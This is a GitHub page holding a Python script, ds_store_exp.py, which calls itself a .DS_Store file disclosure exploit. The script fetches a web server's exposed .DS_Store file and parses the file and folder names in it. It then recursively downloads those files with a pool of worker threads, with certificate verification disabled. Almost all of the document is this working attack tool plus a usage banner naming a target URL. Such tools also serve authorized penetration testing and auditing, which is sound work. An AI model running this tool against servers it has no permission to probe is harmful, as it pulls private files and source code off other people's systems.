-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathds_store_exp.py
executable file
·103 lines (92 loc) · 3.45 KB
/
ds_store_exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# baiyunfei
import os
import queue
import ssl
import sys
import threading
import urllib
import urllib.parse
import urllib.request
from io import BytesIO, StringIO
from urllib.parse import urlparse

from ds_store import DSStore
# Shared SSL context with certificate verification disabled. It is passed to
# urlopen() by the scanner so HTTPS targets whose certificates are self-signed
# or otherwise invalid can still be fetched.
context = ssl._create_unverified_context()
class Scanner(object):
    """Recursively download files disclosed by an exposed ``.DS_Store`` file.

    URLs are taken from a shared queue by a pool of worker threads. Every
    fetched file is saved under a local folder named after the host
    (``:`` replaced by ``_``). Every fetched ``.DS_Store`` file is parsed and
    each name it lists is queued twice: once as a file and once as a
    sub-directory that may expose its own ``.DS_Store``.

    Args:
        start_url: URL of the first ``.DS_Store`` file (scheme optional).
        thread_count: Number of worker threads started by :meth:`scan`.
        idle_timeout: Seconds a worker waits on an empty queue before it
            checks whether all other workers are idle too.
    """

    DS_STORE_NAME = '.DS_Store'

    def __init__(self, start_url, *, thread_count=10, idle_timeout=2.0):
        self.queue = queue.Queue()
        self.queue.put(start_url)
        self.processed_url = set()
        # Guards processed_url, working_thread and console output.
        self.lock = threading.Lock()
        self.working_thread = 0
        self.thread_count = thread_count
        self.idle_timeout = idle_timeout

    def process(self):
        """Worker loop: handle queued URLs until the scan has drained.

        The loop ends when the queue stayed empty for ``idle_timeout``
        seconds and no worker is in the middle of handling a URL (a busy
        worker could still enqueue new URLs).
        """
        while True:
            try:
                url = self.queue.get(timeout=self.idle_timeout)
            except queue.Empty:
                with self.lock:
                    everyone_idle = self.working_thread == 0
                if everyone_idle:
                    break
                continue

            with self.lock:
                self.working_thread += 1
            try:
                self._handle(url)
            except Exception as e:
                # Per-URL boundary: one bad URL must not kill the worker.
                self._log(f'[!] {str(e)}')
            finally:
                with self.lock:
                    self.working_thread -= 1

    def scan(self):
        """Start the worker threads and return them without waiting.

        Returns:
            The list of started (non-daemon) ``threading.Thread`` objects, so
            a caller may ``join()`` them.
        """
        all_threads = []
        for _ in range(self.thread_count):
            t = threading.Thread(target=self.process)
            all_threads.append(t)
            t.start()
        return all_threads

    def _log(self, message):
        """Print *message* while holding the lock so lines do not interleave."""
        with self.lock:
            print(message)

    def _handle(self, url):
        """Fetch one URL, save it locally and queue what a .DS_Store lists."""
        if not url.lower().startswith('http'):
            url = 'http://%s' % url

        # Check-and-add must be atomic, otherwise two workers can both decide
        # the same URL is new.
        with self.lock:
            if url in self.processed_url:
                return
            self.processed_url.add(url)

        data = self._fetch(url)
        if data is None:
            return

        _, netloc, path, _, _, _ = urlparse(url, 'http')
        target = self._local_path(netloc, path)
        if target is None:
            self._log(f'[!] refusing to write outside the download folder: {url}')
            return
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, 'wb') as out_file:
            out_file.write(data)
        self._log(f'200,{url}')

        if url.endswith(self.DS_STORE_NAME):
            self._enqueue_children(self._base_url(url), data)

    def _fetch(self, url):
        """Return the body of *url* when it answers 200, otherwise ``None``.

        404 responses are expected (most guessed URLs do not exist) and stay
        silent; other HTTP errors and network failures are reported.
        """
        try:
            response = urllib.request.urlopen(url, context=context)
        except Exception as e:
            code = getattr(e, 'code', None)
            if code is None:
                self._log(f'[!] {url}: {e}')
            elif code != 404:
                self._log(f'{code}, {url}')
            return None
        with response:
            if response.code != 200:
                return None
            return response.read()

    def _enqueue_children(self, base_url, data):
        """Parse .DS_Store bytes and queue every listed name under *base_url*."""
        # The payload is bytes, so it needs a binary in-memory file.
        store = DSStore.open(BytesIO(data))
        try:
            names = {entry.filename for entry in store._traverse(None)}
        finally:
            store.close()
        for name in names:
            if name != '.':
                # Names come from the remote file: percent-encode them so
                # spaces, '?', '#', '%' and non-ASCII characters form a valid URL.
                child = base_url + urllib.parse.quote(name)
                self.queue.put(child)
                self.queue.put(child + '/.DS_Store')

    @staticmethod
    def _base_url(url):
        """Return *url* without a trailing ``.DS_Store`` (exact suffix only)."""
        suffix = Scanner.DS_STORE_NAME
        if url.endswith(suffix):
            return url[:-len(suffix)]
        return url

    @staticmethod
    def _local_path(netloc, path):
        """Map a URL to its local file path, or ``None`` if it would escape.

        The file lives under a folder named after *netloc*. Because *path* is
        influenced by the remote server, anything that resolves outside that
        folder (for example via ``..``) is rejected.
        """
        root = netloc.replace(':', '_')
        target = root + urllib.parse.unquote(path)
        root_abs = os.path.abspath(root)
        target_abs = os.path.abspath(target)
        if not target_abs.startswith(root_abs + os.sep):
            return None
        return target
if __name__ == '__main__':
    # Without a target URL on the command line, show a short description and
    # the usage line, then exit successfully.
    if len(sys.argv) == 1:
        banner = (
            'A .DS_Store file disclosure exploit.',
            'It parses .DS_Store and downloads file recursively.',
            '',
            ' Usage: python ds_store_exp.py http://www.example.com/.DS_Store',
        )
        print('\n'.join(banner))
        sys.exit(0)
    # The first argument is the URL of the .DS_Store file to start from.
    scanner = Scanner(sys.argv[1])
    scanner.scan()